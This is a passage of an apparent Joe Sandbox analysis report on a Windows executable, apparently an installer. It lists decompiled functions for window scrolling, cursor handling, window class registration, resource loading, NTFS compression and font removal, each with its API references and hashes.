Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: LoadString$FileMessageModuleName
String ID:
API String ID: 704749118-0
Opcode ID: fea9a368a89c386dd3579c3314086181e5495c38b00c0fb169f00db9bc71266b
Instruction ID: 00047562bc896292eae92fc83f22833cb5706b72e5976c979f35d299ad0ec2f6
Opcode Fuzzy Hash: fea9a368a89c386dd3579c3314086181e5495c38b00c0fb169f00db9bc71266b
Instruction Fuzzy Hash: 853112716083809BE330EB65C945BDB77E89B85704F44483FB6C8D72D1EB7999048B6B

Uniqueness

Uniqueness Score: -1.00%

Function 0044DEFC Relevance: 6.1, APIs: 4, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044DEFC(intOrPtr* __eax, void* __ecx, int __edx, void* __eflags) {
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t13;
				intOrPtr* _t43;
				void* _t55;
				long _t56;
				int _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t44 = __ecx;
				_t55 = __ecx;
				_t57 = __edx;
				_t43 = __eax;
				_t13 = E00403684( *((intOrPtr*)(E0044D4B4(__eax) + 0x14)), __ecx);
				if(_t61 == 0) {
					return _t13;
				}
				E00403450(E0044D4B4(_t43) + 0x14, _t43, _t55, _t55, __edx);
				_t56 = SendMessageA(E004181C8(_t43), 0x1a1, __edx, 0);
				_t58 = E0044C588(_t43, _t44, _t57, _t61);
				E0042BC90(_t43,  &_v32, _t57);
				if(_t56 != _t58) {
					if(_t57 >= E0042BB9C(_t43)) {
						 *((intOrPtr*)( *_t43 + 0x2c))();
						_v32.top = _v48.top + _t56;
						if(IsRectEmpty( &_v32) == 0) {
							ScrollWindowEx(E004181C8(_t43), 0, _t58 - _t56,  &_v32, 0, 0, 0, 6);
						}
					}
					E0044C5C8(_t43);
				}
				return InvalidateRect(E004181C8(_t43),  &_v48, 1);
			}

0x0044defc
0x0044defc
0x0044df03
0x0044df05
0x0044df07
0x0044df17
0x0044df1c
0x0044dfd5
0x0044dfd5
0x0044df30
0x0044df4a
0x0044df55
0x0044df5d
0x0044df64
0x0044df6f
0x0044df79
0x0044df82
0x0044df92
0x0044dfae
0x0044dfae
0x0044df92
0x0044dfb5
0x0044dfb5
0x00000000

APIs

SendMessageA.USER32 ref: 0044DF45

Part of subcall function 0044C588: SendMessageA.USER32 ref: 0044C5BA

InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044DFC9

Part of subcall function 0042BB9C: SendMessageA.USER32 ref: 0042BBB0

IsRectEmpty.USER32(?), ref: 0044DF8B
ScrollWindowEx.USER32 ref: 0044DFAE

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
String ID:
API String ID: 855768636-0
Opcode ID: 8beadaaf667f0e76c8bb6a3f0dd05fd350602966c7aa4db21655f2df77cd155f
Instruction ID: aef3801dd175dc9c32e5e06c16a8f84906a60ef011ead4f401377c2e5f976240
Opcode Fuzzy Hash: 8beadaaf667f0e76c8bb6a3f0dd05fd350602966c7aa4db21655f2df77cd155f
Instruction Fuzzy Hash: 99114A72B4031027E620BA7A8C86B5F66C99B98759F04083FB506EB383DE7DDC194399

Uniqueness

Uniqueness Score: -1.00%

Function 00493BB8 Relevance: 6.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00493BB8(void* __eax, intOrPtr* __edx) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				struct tagRECT _v48;
				signed int _t26;
				signed int _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t50;
				signed int _t55;
				signed int _t56;
				void* _t57;
				long _t59;
				intOrPtr _t60;
				long _t61;
				intOrPtr _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				void* _t67;

				_t67 =  &_v32;
				_t65 = __edx;
				_t50 = __eax;
				_push( *((intOrPtr*)(__eax + 0x30)));
				_push( &_v48);
				_t66 =  *((intOrPtr*)(__edx + 4));
				_t55 =  *((intOrPtr*)(__edx + 0xc)) - _t66 -  *((intOrPtr*)(__eax + 0x30));
				_t56 = _t55 >> 1;
				if(_t55 < 0) {
					asm("adc edx, 0x0");
				}
				_t57 = _t56 + _t66;
				_t64 =  *_t65;
				_t26 =  *((intOrPtr*)(_t65 + 8)) -  *_t65 -  *((intOrPtr*)(_t50 + 0x2c));
				_t27 = _t26 >> 1;
				if(_t26 < 0) {
					asm("adc eax, 0x0");
				}
				E0040AC3C(_t27 + _t64,  *((intOrPtr*)(_t50 + 0x2c)), _t57);
				E004935C0(_t67,  &(_v48.right));
				_t32 = _v32;
				_t59 = _v48.left;
				if(_t32 < _t59) {
					OffsetRect( &_v48, _t32 - _t59, 0);
				}
				_t33 = _v20;
				_t60 = _v48.bottom;
				if(_t33 < _t60) {
					OffsetRect( &_v48, 0, _t33 - _t60);
				}
				_t34 = _v32;
				_t61 = _v48.left;
				if(_t34 > _t61) {
					OffsetRect( &_v48, _t34 - _t61, 0);
				}
				_t35 = _v28;
				_t62 = _v48.top;
				if(_t35 > _t62) {
					OffsetRect( &_v48, 0, _t35 - _t62);
				}
				return E00414664(_t50, _t67);
			}

0x00493bbc
0x00493bbf
0x00493bc1
0x00493bc6
0x00493bcb
0x00493bcf
0x00493bd4
0x00493bd7
0x00493bd9
0x00493bdb
0x00493bdb
0x00493bde
0x00493be3
0x00493be7
0x00493bea
0x00493bec
0x00493bee
0x00493bee
0x00493bf6
0x00493c01
0x00493c06
0x00493c0a
0x00493c10
0x00493c1c
0x00493c1c
0x00493c21
0x00493c25
0x00493c2b
0x00493c37
0x00493c37
0x00493c3c
0x00493c40
0x00493c45
0x00493c51
0x00493c51
0x00493c56
0x00493c5a
0x00493c60
0x00493c6c
0x00493c6c
0x00493c81

APIs

OffsetRect.USER32(?,?,00000000), ref: 00493C1C
OffsetRect.USER32(?,00000000,?), ref: 00493C37
OffsetRect.USER32(?,?,00000000), ref: 00493C51
OffsetRect.USER32(?,00000000,?), ref: 00493C6C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: OffsetRect
String ID:
API String ID: 177026234-0
Opcode ID: 37c02f2732351b85fe6e18ebd3d448150a5576b07545843ebd70591764eaa53f
Instruction ID: f65d0900f560fcc952ae0e27cf9e39305c7a0972bf48f558fbf7b8a6fb88b1c7
Opcode Fuzzy Hash: 37c02f2732351b85fe6e18ebd3d448150a5576b07545843ebd70591764eaa53f
Instruction Fuzzy Hash: A0218CB6704201ABDB00DE69CD85E6BBBDEEBC4305F14CA2AF954C7249D634E90487A6

Uniqueness

Uniqueness Score: -1.00%

Function 00417200 Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417200(intOrPtr* __eax, void* __edx) {
				char _v20;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				struct HWND__* _t26;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				struct HICON__* _t34;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr _t50;
				void* _t51;
				struct tagPOINT* _t52;

				_t51 = __edx;
				_t40 = __eax;
				if( *((intOrPtr*)(__edx + 4)) !=  *((intOrPtr*)(__eax + 0xc0))) {
					L16:
					return  *((intOrPtr*)( *_t40 - 0x10))();
				}
				_t22 =  *((intOrPtr*)(__edx + 8)) - 0xfffe;
				if(_t22 == 0) {
					if( *((short*)(__edx + 0xa)) != 0x201) {
						goto L16;
					}
					_t23 =  *0x49a628; // 0x2262410
					if( *((intOrPtr*)(_t23 + 0x20)) == 0) {
						goto L16;
					}
					_t24 =  *0x49a628; // 0x2262410
					_t26 = GetLastActivePopup( *(_t24 + 0x20));
					if(_t26 == GetForegroundWindow()) {
						goto L16;
					}
					_t28 =  *0x49a628; // 0x2262410
					return E00424228(_t28);
				}
				if(_t22 != 3) {
					goto L16;
				}
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					_t31 =  *0x49a62c; // 0x2260660
					_t50 =  *((intOrPtr*)(_t31 + 0x28));
					if(_t50 == 0) {
						GetCursorPos(_t52);
						E004147A4(_t40,  &_v20, _t52);
						_t39 = E004168B8(_t40, 0,  &_v20);
						if(_t39 != 0) {
							_t50 =  *((intOrPtr*)(_t39 + 0x4c));
						}
						if(_t50 == 0) {
							_t50 =  *((intOrPtr*)(_t40 + 0x4c));
						}
					}
				} else {
					_t50 = 0xfffe;
				}
				if(_t50 == 0) {
					goto L16;
				} else {
					_t32 =  *0x49a62c; // 0x2260660
					_t34 = SetCursor(E00423354(_t32, _t50));
					 *((intOrPtr*)(_t51 + 0xc)) = 1;
					return _t34;
				}
			}

0x00417206
0x00417208
0x00417213
0x004172d1
0x00000000
0x004172d7
0x0041721d
0x00417221
0x0041729f
0x00000000
0x00000000
0x004172a1
0x004172aa
0x00000000
0x00000000
0x004172ac
0x004172b5
0x004172c3
0x00000000
0x00000000
0x004172c5
0x00000000
0x004172ca
0x00417227
0x00000000
0x00000000
0x00417231
0x00417239
0x0041723e
0x00417245
0x00417248
0x00417255
0x00417262
0x00417269
0x0041726b
0x0041726b
0x00417272
0x00417274
0x00417274
0x00417272
0x00417233
0x00417233
0x00417233
0x0041727b
0x00000000
0x0041727d
0x00417280
0x0041728b
0x00417290
0x00000000
0x00417290

APIs

GetCursorPos.USER32 ref: 00417248
SetCursor.USER32(00000000), ref: 0041728B
GetLastActivePopup.USER32(?), ref: 004172B5
GetForegroundWindow.USER32(?), ref: 004172BC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Cursor$ActiveForegroundLastPopupWindow
String ID:
API String ID: 1959210111-0
Opcode ID: f9b7bf21fd8922fb7f9da71226400e527e4ad197ed769eca181c9807d9be9f57
Instruction ID: b826a2350a425d8d56277764797b706088dbb3a68c20bc35c201dc7f13df9d46
Opcode Fuzzy Hash: f9b7bf21fd8922fb7f9da71226400e527e4ad197ed769eca181c9807d9be9f57
Instruction Fuzzy Hash: 9221B3313042008ACB10EB69C984AD733B1AF58768B5685BBF8449B392D73DDCC2CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00493870 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00493870(intOrPtr* __eax, int __ecx, int __edx, int _a4, int _a8) {
				int _v8;
				int _v12;
				intOrPtr* _t38;
				int _t48;
				int _t49;
				int _t52;
				int _t53;

				_t48 = __ecx;
				_t52 = __edx;
				_t38 = __eax;
				_v8 = MulDiv( *(__eax + 0x24), __edx, __ecx);
				_v12 = MulDiv( *(_t38 + 0x28), _a8, _a4);
				if(( *(_t38 + 0x35) & 0x00000001) != 0) {
					_t53 =  *(_t38 + 0x2c);
				} else {
					_t53 = MulDiv( *(_t38 + 0x2c), _t52, _t48);
				}
				if(( *(_t38 + 0x35) & 0x00000002) != 0) {
					_t49 =  *(_t38 + 0x30);
				} else {
					_t49 = MulDiv( *(_t38 + 0x30), _a8, _a4);
				}
				return  *((intOrPtr*)( *_t38 + 0x4c))(_t49, _t53);
			}

0x00493879
0x0049387b
0x0049387d
0x0049388a
0x0049389e
0x004938a5
0x004938b6
0x004938a7
0x004938b2
0x004938b2
0x004938bd
0x004938d4
0x004938bf
0x004938d0
0x004938d0
0x004938ec

APIs

MulDiv.KERNEL32(?,00000008,?), ref: 00493885
MulDiv.KERNEL32(?,00000008,?), ref: 00493899
MulDiv.KERNEL32(?,00000008,?), ref: 004938AD
MulDiv.KERNEL32(?,00000008,?), ref: 004938CB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c743c6b27eefd6cab486c462f54d795bae45f37f50d13c17f9c8637463e693f
Instruction ID: 5653efebbc7a30ab2eb6b0d7d640e5bf66e03e3c642689ea58aa2ed4b22252ee
Opcode Fuzzy Hash: 6c743c6b27eefd6cab486c462f54d795bae45f37f50d13c17f9c8637463e693f
Instruction Fuzzy Hash: 8E112472604204AFCF40EE99D8C4D9B7BECEF4D364B1441A6F918DB246D634ED408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F468 Relevance: 6.1, APIs: 4, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041F468(intOrPtr _a4, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				struct HINSTANCE__* _t8;
				signed int _t9;
				signed int _t11;
				struct HINSTANCE__* _t13;
				CHAR* _t14;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;

				_t5 =  *0x49a014; // 0x400000
				 *0x4985a8 = _t5;
				_t7 =  *0x4985bc; // 0x41f458
				_t8 =  *0x49a014; // 0x400000
				_t9 = GetClassInfoA(_t8, _t7,  &_v44);
				asm("sbb eax, eax");
				_t11 =  ~( ~_t9);
				if(_t11 == 0 || L00405E1C != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x49a014; // 0x400000
						_t20 =  *0x4985bc; // 0x41f458
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x498598);
				}
				_t13 =  *0x49a014; // 0x400000
				_t14 =  *0x4985bc; // 0x41f458
				_t22 = E00406300(_t14, 0, 0x41f508, 0, _t13, 0, 0, 0, 0, 0, 0);
				SetWindowLongA(_t22, 0xfffffffc, E0041F3AC(_a4, _a8));
				return _t22;
			}

0x0041f46f
0x0041f474
0x0041f47d
0x0041f483
0x0041f489
0x0041f490
0x0041f492
0x0041f496
0x0041f4a4
0x0041f4a6
0x0041f4ac
0x0041f4b2
0x0041f4b2
0x0041f4bc
0x0041f4bc
0x0041f4cd
0x0041f4dc
0x0041f4e6
0x0041f4f7
0x0041f502

APIs

GetClassInfoA.USER32 ref: 0041F489
UnregisterClassA.USER32 ref: 0041F4B2
RegisterClassA.USER32 ref: 0041F4BC
SetWindowLongA.USER32 ref: 0041F4F7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow
String ID:
API String ID: 4025006896-0
Opcode ID: 0b1a5e90ea599a0961c5be15fe06e8290fc74b2ca7d7cec1263de347709274d1
Instruction ID: 9d7d8ad8aa831552a82a53d5345394442936d3ade59afb2306efe89d8dafa453
Opcode Fuzzy Hash: 0b1a5e90ea599a0961c5be15fe06e8290fc74b2ca7d7cec1263de347709274d1
Instruction Fuzzy Hash: 3E0140712401047BCB10EF69DC81E9B3798A769314B11413BBA05E72E2DA3A9D199BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1E8 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040D1E8(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t30;
				void* _t31;
				struct HINSTANCE__* _t32;
				void* _t33;

				_v8 = _t24;
				_t32 = __edx;
				_t23 = __eax;
				_t30 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0040D174(_t23, _t30, _t32, _t34, _t33);
				}
				_t5 = _t23 + 0x10; // 0x72756f73
				_t31 = LoadResource(_t32,  *_t5);
				 *(_t23 + 0x14) = _t31;
				_t35 = _t31;
				if(_t31 == 0) {
					E0040D174(_t23, _t31, _t32, _t35, _t33);
				}
				_t7 = _t23 + 0x10; // 0x72756f73
				_push(SizeofResource(_t32,  *_t7));
				_t8 = _t23 + 0x14; // 0x74536563
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0040CEFC(_t23, _t25, _t18);
			}

0x0040d1ef
0x0040d1f2
0x0040d1f4
0x0040d204
0x0040d206
0x0040d209
0x0040d20b
0x0040d20e
0x0040d213
0x0040d214
0x0040d21e
0x0040d220
0x0040d223
0x0040d225
0x0040d228
0x0040d22d
0x0040d22e
0x0040d238
0x0040d239
0x0040d23d
0x0040d246
0x0040d251

APIs

FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D1FF
LoadResource.KERNEL32(00400000,72756F73,0040A9A0,00400000,00000001,00000000,?,0040D15C,00000000,?,00000000,?,?,0047B138,0000000A,REGDLL_EXE), ref: 0040D219
SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9A0,00400000,00000001,00000000,?,0040D15C,00000000,?,00000000,?,?,0047B138), ref: 0040D233
LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9A0,00400000,00000001,00000000,?,0040D15C,00000000,?,00000000,?), ref: 0040D23D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: b279d3f610e2c33ebbf1aae390b1dfca18960dc51c8f97af3b47f4ea3713b060
Instruction ID: 317aed317d3b892ebdcd66b9e6bae3e249017520f8437a3530a96d2459133adc
Opcode Fuzzy Hash: b279d3f610e2c33ebbf1aae390b1dfca18960dc51c8f97af3b47f4ea3713b060
Instruction Fuzzy Hash: 09F01DB36056046F9745EE9EA881D6B77ECDF88364320017FF908EB256DA38DD118B78

Uniqueness

Uniqueness Score: -1.00%

Function 0046EA50 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046EA50(char __eax, void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v12;
				char _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t22;
				char _t34;

				_t33 = __edi;
				_t22 = __ecx;
				_t34 = __edx;
				_v5 = __eax;
				_t35 = __ecx;
				if(__ecx == 0) {
					_v16 = __edx;
					_v12 = 0xb;
					__eflags = 0;
					E00456D64("Unsetting NTFS compression on directory: %s", __ecx, 0,  &_v16, __edi, __edx);
				} else {
					_v16 = __edx;
					_v12 = 0xb;
					E00456D64("Setting NTFS compression on directory: %s", __ecx, 0,  &_v16, __edi, __edx);
				}
				_t16 = E00452264(_v5, _t22, _t34, _t35);
				if(_t16 == 0) {
					_v16 = GetLastError();
					_v12 = 0;
					return E00456D64("Failed to set NTFS compression state (%d).", _t22, 0,  &_v16, _t33, _t34);
				}
				return _t16;
			}

0x0046ea50
0x0046ea58
0x0046ea5a
0x0046ea5c
0x0046ea5f
0x0046ea61
0x0046ea7b
0x0046ea7e
0x0046ea85
0x0046ea8c
0x0046ea63
0x0046ea63
0x0046ea66
0x0046ea74
0x0046ea74
0x0046ea98
0x0046ea9f
0x0046eaa6
0x0046eaa9
0x00000000
0x0046eab7
0x0046eac1

APIs

GetLastError.KERNEL32(00000000,00000000), ref: 0046EAA1

Strings

Failed to set NTFS compression state (%d)., xrefs: 0046EAB2
Unsetting NTFS compression on directory: %s, xrefs: 0046EA87
Setting NTFS compression on directory: %s, xrefs: 0046EA6F

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
API String ID: 1452528299-1392080489
Opcode ID: 3f2085e131380c7f5da77398344f1736c5cf7d5eb251f8b2b402a33526aece9f
Instruction ID: 3efdd372df2affd4ade082c6483982d5e4590e080722fc2af47a54a846c8b7b9
Opcode Fuzzy Hash: 3f2085e131380c7f5da77398344f1736c5cf7d5eb251f8b2b402a33526aece9f
Instruction Fuzzy Hash: 1E016234E0824896CF14D7EE90412EDBBF49F09704F44C5EFE456EB282EA791A09C79B

Uniqueness

Uniqueness Score: -1.00%

Function 00454FB8 Relevance: 6.0, APIs: 4, Instructions: 41
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00454FB8(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				void* _v12;
				int _t13;
				void* _t20;
				void* _t26;

				_push(__ecx);
				_t20 = __edx;
				_t26 = __eax;
				if(E0042DD1C(0,  *((intOrPtr*)(0x498a50 + (E0042DAF4( &_v12) & 0x0000007f) * 4)), 0x80000002,  &_v12, 2, 0) == 0) {
					RegDeleteValueA(_v12, E00403738(_t26));
					RegCloseKey(_v12);
				}
				_t13 = RemoveFontResourceA(E00403738(_t20));
				if(_t13 != 0) {
					_t13 = SendNotifyMessageA(0xffff, 0x1d, 0, 0);
				}
				return _t13;
			}

0x00454fba
0x00454fbb
0x00454fbd
0x00454fe5
0x00454ff4
0x00454ffd
0x00454ffd
0x0045500a
0x00455011
0x0045501e
0x0045501e
0x00455026

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AB4A,?,?,?,?,?,00000000,0045AB71), ref: 00454FF4
RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AB4A,?,?,?,?,?,00000000), ref: 00454FFD
RemoveFontResourceA.GDI32(00000000), ref: 0045500A
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045501E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
String ID:
API String ID: 4283692357-0
Opcode ID: 625e570084ae5814c1b6f55d5e6d564c31ff94d0b4d981c5a08e3b29c4c6f2ed
Instruction ID: 939da9693d8b7a58c52c965e3ea10a2d1f3c938dc4a11dd4f6774f6072705970
Opcode Fuzzy Hash: 625e570084ae5814c1b6f55d5e6d564c31ff94d0b4d981c5a08e3b29c4c6f2ed
Instruction Fuzzy Hash: 4BF05EB574471136EA20B6BA9C87F6B228C9F58749F10483BBA00EF2C3D9BCD804566D

Uniqueness

Uniqueness Score: -1.00%

Function 0046F1FC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046F1FC(char __eax, void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v12;
				char _v16;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t22;
				char _t34;

				_t33 = __edi;
				_t22 = __ecx;
				_t34 = __edx;
				_v5 = __eax;
				_t35 = __ecx;
				if(__ecx == 0) {
					_v16 = __edx;
					_v12 = 0xb;
					__eflags = 0;
					E00456D64("Unsetting NTFS compression on file: %s", __ecx, 0,  &_v16, __edi, __edx);
				} else {
					_v16 = __edx;
					_v12 = 0xb;
					E00456D64("Setting NTFS compression on file: %s", __ecx, 0,  &_v16, __edi, __edx);
				}
				_t16 = E00452264(_v5, _t22, _t34, _t35);
				if(_t16 == 0) {
					_v16 = GetLastError();
					_v12 = 0;
					return E00456D64("Failed to set NTFS compression state (%d).", _t22, 0,  &_v16, _t33, _t34);
				}
				return _t16;
			}

0x0046f1fc
0x0046f204
0x0046f206
0x0046f208
0x0046f20b
0x0046f20d
0x0046f227
0x0046f22a
0x0046f231
0x0046f238
0x0046f20f
0x0046f20f
0x0046f212
0x0046f220
0x0046f220
0x0046f244
0x0046f24b
0x0046f252
0x0046f255
0x00000000
0x0046f263
0x0046f26d

APIs

GetLastError.KERNEL32(?,00000000), ref: 0046F24D

Strings

Setting NTFS compression on file: %s, xrefs: 0046F21B
Failed to set NTFS compression state (%d)., xrefs: 0046F25E
Unsetting NTFS compression on file: %s, xrefs: 0046F233

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
